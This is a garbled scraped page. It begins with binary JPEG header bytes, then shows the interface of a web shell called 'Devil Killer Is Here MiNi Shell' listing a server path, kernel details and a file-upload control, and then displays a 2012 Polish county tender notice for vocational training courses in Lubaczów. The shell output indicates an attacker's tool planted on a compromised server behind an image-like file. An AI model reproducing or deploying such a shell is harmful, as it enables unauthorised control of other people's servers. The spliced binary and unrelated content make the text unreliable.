JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/480568-N-2012.html

<p class="kh_header"><b>Lubaczów: Realizacja szkoleń, praktyk, zajęć wyrównawczych i pozalekcyjnych oraz wyjazdów dydaktycznych dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP II - Zadanie nr 1, Zadanie nr 2 i Zadanie nr 3</b><br>
<b>Numer ogłoszenia: 480568 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lubaczowski , ul. Jasna 1, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6328700, faks 016 6328709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubaczow.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja szkoleń, praktyk, zajęć wyrównawczych i pozalekcyjnych oraz wyjazdów dydaktycznych dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP II - Zadanie nr 1, Zadanie nr 2 i Zadanie nr 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja szkoleń,  praktyk, zajęć wyrównawczych i pozalekcyjnych oraz wyjazdów dydaktycznych dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP II. Projekt jest współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Uczestnikami projektu będą uczniowie i nauczyciele Zespołu Szkół im. Gen. J. Kustronia w Lubaczowie oraz Zespołu Szkół w Oleszycach.

2. ZADANIE NR 1 - Kursy zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1)	Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Lubaczowie w wymiarze 10 godz. lekcyjnych,
2)	Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Oleszycach w wymiarze 10 godz. lekcyjnych,
3)	Obsługa programu Optima - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 18 osób,  w wymiarze 21 godz. lekcyjnych,
4)	Rozliczanie działalności handlowej z obsługą kas fiskalnych - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 18 osób,  w wymiarze 7 godz. lekcyjnych,
5)	Kurs obsługi programu System Sprzedaży Optima - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Sprzedawca , I grupa 8 osób,  II grupa  8 osób, w wymiarze 7 godz. lekcyjnych dla każdej grupy,
6)	Kurs spawania metodą 1,2,3 - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 15 osób,  w wymiarze 33 godz. lekcyjnych teoretycznych i 200 godz. lekcyjnych praktycznych,
7)	Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 12 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
8)	Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 8 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
9)	Obsługa wózków widłowych - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 16 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
10)	Kurs wózków widłowych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 12 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
11)	Kurs obsługi wózków widłowych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 5 osób,  w wymiarze 62 godz. lekcyjnych (w tym 47 godz. praktycznych i 15 godz. teoretycznych),
12)	Kurs wizażu i stylizacji - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Fryzjer  I grupa 29 osób w wymiarze 65 godz. lekcyjnych (w tym 25. godz. teoretycznych i 40 godz. praktycznych),
13)	Kurs animator czasu wolnego - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Obsługi Turystycznej, I grupa 15 osób, w wymiarze 18 godz. lekcyjnych,
14)	Kurs parzenia kawy w ekspresach wysokociśnieniowych - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Żywienia i Usług Gastronomicznych, I grupa 10 osób, w wymiarze 18 godz. lekcyjnych,
15)	Kurs przygotowania i obsługi przyjęć - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Żywienia i Usług Gastronomicznych , I grupa 10 osób, w wymiarze 18 godz. lekcyjnych,


3.	ZADANIE NR 2 - Szkolenia informatyczne - zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1)	AutoCAD/Mechanikal dla uczniów - 12 uczniów ZS w Lubaczowie, w wymiarze 40 godz. lekcyjnych,


4.	ZADANIE NR 3 - Kursy / Szkolenia informatyczne dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1)	Administrowanie bazą danych Microsoft SQL Server - 2 nauczycieli ZS w Lubaczowie, w wymiarze 24 godz. lekcyjnych,
2)	Projektowanie aplikacji bazodanowych Access - 1 nauczyciel ZS w Lubaczowie, w wymiarze 24 godz. lekcyjnych,
3)	Język SQL w bazie danych Oracle - 2 nauczycieli ZS w Lubaczowie, w wymiarze 60 godz. lekcyjnych,
4)	Kurs Academia Cisco dla uczniów - kurs dla uczniów Technikum Informatycznego ZS w Lubaczowie, I grupa 15 osób,  w wymiarze 120 godz. lekcyjnych,
5)	Kurs ECDL dla uczniów - kurs dla uczniów Technikum Informatycznego ZS w Lubaczowie, I grupa 15 osób, w wymiarze 120 godz. lekcyjnych,

5.	Szkolenia realizowane będą w salach lekcyjnych Zespołu Szkół w Lubaczowie oraz Zespołu Szkół w Oleszycach lub w innym miejscu przypisanym do danego szkolenia. Sale szkoleniowe powinny być wyposażone w niezbędne pomoce dydaktyczne, przystosowane sprzętowo do tematyki prowadzonych zajęć. 

6.	Wykonawca ma obowiązek:
a) zapewnienia dla wszystkich uczestników szkoleń wyżywienia (dotyczy tych szkoleń dla których przewidziano wyżywienie uczestników)
b) zapewnienia odpowiednich materiałów dydaktycznych dla uczestników oraz oznaczenia ich odpowiednimi logami wymaganymi przy projektach realizowanych z POKL-u.
c) przeprowadzenia 2 ankiet (na początku i na końcu realizacji każdego z w/w działań) wśród uczestników badających zagadnienia określone przez Zamawiającego. Ankiety muszą być przygotowane w formie pisemnej z późniejszym zestawieniem i wynikami badanych tematów. 


7.	Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 6, 7 i 8 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż  50% zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Na podstawie art. 45 ust. 2 ustawy Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków 	udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo 	zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków 	udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo 	zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków 	udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo 	zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków 	udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo 	zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków 	udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo 	zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Dopuszczalne zmiany treści zawartej umowy oraz warunki dokonania takich zmian zostały określone w § 7 wzoru umowy: § 7.

1.	Zakazane jest dokonywanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2.	Dopuszczalne są następujące zmiany treści umowy:
a.	zmniejszenie zakresu zamówienia w przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, 
b.	zmiana terminów organizacji poszczególnych szkoleń, jeżeli będzie to podyktowane względami organizacyjnymi,
c.	powierzenie Podwykonawcy określonego zakresu realizowanego zamówienia pod warunkiem, 
że Zamawiający nie zastrzegł, że dana część zamówienia nie może być powierzona Podwykonawcom,
d.	wydłużenie okresu realizacji zamówienia w przypadku braku wymaganej liczby uczestników szkoleń 
z przyczyn leżących po stronie Zamawiającego. 
3.	 Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubaczow.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lubaczowie, ul. Jasna 1, 37-600 Lubaczów, pok. nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Lubaczowie, ul. Jasna 1, 37-600 Lubaczów, pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Realizacja szkoleń, praktyk, zajęć wyrównawczych 
i pozalekcyjnych oraz wyjazdów dydaktycznych
 dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP II - Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ZADANIE NR 1 - Kursy zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1)	Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Lubaczowie 
w wymiarze 10 godz. lekcyjnych,
2)	Szkolenie rad pedagogicznych - doradztwo zawodowe - 1 nauczyciel ZS w Oleszycach 
w wymiarze 10 godz. lekcyjnych,
3)	Obsługa programu Optima - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, 
I grupa 18 osób,  w wymiarze 21 godz. lekcyjnych,
4)	Rozliczanie działalności handlowej z obsługą kas fiskalnych - kurs dla uczniów Technikum Ekonomicznego ZS w Lubaczowie, I grupa 18 osób,  w wymiarze 7 godz. lekcyjnych,
5)	Kurs obsługi programu System Sprzedaży Optima - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Sprzedawca , I grupa 8 osób,  II grupa  8 osób, w wymiarze 7 godz. lekcyjnych dla każdej grupy,
6)	Kurs spawania metodą 1,2,3 - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, 
I grupa 15 osób,  w wymiarze 33 godz. lekcyjnych teoretycznych i 200 godz. lekcyjnych praktycznych,
7)	Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 12 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
8)	Kurs spawania metodą 1,2,3  - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 8 osób,  w wymiarze 200 godz. lekcyjnych praktycznych i 33 godz. lekcyjnych teoretycznych,
9)	Obsługa wózków widłowych - kurs dla uczniów Technikum Mechanicznego ZS w Lubaczowie, I grupa 16 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
10)	Kurs wózków widłowych - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Ślusarz , I grupa 12 osób,  w wymiarze 47 godz. lekcyjnych teoretycznych i 15 godz. lekcyjnych praktycznych,
11)	Kurs obsługi wózków widłowych - kurs dla uczniów Zasadniczej Szkoły Zawodowej 
w Lubaczowie kierunek: Mechanik pojazdów samochodowych , I grupa 5 osób,  w wymiarze 62 godz. lekcyjnych (w tym 47 godz. praktycznych i 15 godz. teoretycznych),
12)	Kurs wizażu i stylizacji - kurs dla uczniów Zasadniczej Szkoły Zawodowej w Lubaczowie kierunek: Fryzjer  I grupa 29 osób w wymiarze 65 godz. lekcyjnych (w tym 25. godz. teoretycznych 
i 40 godz. praktycznych),
13)	Kurs animator czasu wolnego - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Obsługi Turystycznej, I grupa 15 osób, w wymiarze 18 godz. lekcyjnych,
14)	Kurs parzenia kawy w ekspresach wysokociśnieniowych - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Żywienia i Usług Gastronomicznych, I grupa 10 osób, w wymiarze 18 godz. lekcyjnych,
15)	Kurs przygotowania i obsługi przyjęć - kurs dla uczniów Technikum w ZS w Oleszycach, kierunek: Technik Żywienia i Usług Gastronomicznych , I grupa 10 osób, w wymiarze 18 godz. lekcyjnych.

2. Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 6 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Realizacja szkoleń, praktyk, zajęć wyrównawczych 
i pozalekcyjnych oraz wyjazdów dydaktycznych
 dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP II - Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ZADANIE NR 2 - Szkolenia informatyczne - zawodowe dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1)	AutoCAD/Mechanikal dla uczniów - 12 uczniów ZS w Lubaczowie, w wymiarze 40 godz. lekcyjnych.
2. Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 7  do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.21.00.00-9, 80.50.00.00-9, 80.53.00.00-8, 80.53.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Realizacja szkoleń, praktyk, zajęć wyrównawczych 
i pozalekcyjnych oraz wyjazdów dydaktycznych
 dla uczestników projektu: Podkarpacie stawia na zawodowców - ETAP II - Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ZADANIE NR 3 - Kursy / Szkolenia informatyczne dla beneficjentów projektu: Podkarpacie stawia na zawodowców:
1)	Administrowanie bazą danych Microsoft SQL Server - 2 nauczycieli ZS w Lubaczowie, 
w wymiarze 24 godz. lekcyjnych,
2)	Projektowanie aplikacji bazodanowych Access - 1 nauczyciel ZS w Lubaczowie, w wymiarze 24 godz. lekcyjnych,
3)	Język SQL w bazie danych Oracle - 2 nauczycieli ZS w Lubaczowie, w wymiarze 60 godz. lekcyjnych,
4)	Kurs Academia Cisco dla uczniów - kurs dla uczniów Technikum Informatycznego ZS 
w Lubaczowie, I grupa 15 osób,  w wymiarze 120 godz. lekcyjnych,
5)	Kurs ECDL dla uczniów - kurs dla uczniów Technikum Informatycznego ZS w Lubaczowie, 
I grupa 15 osób, w wymiarze 120 godz. lekcyjnych.
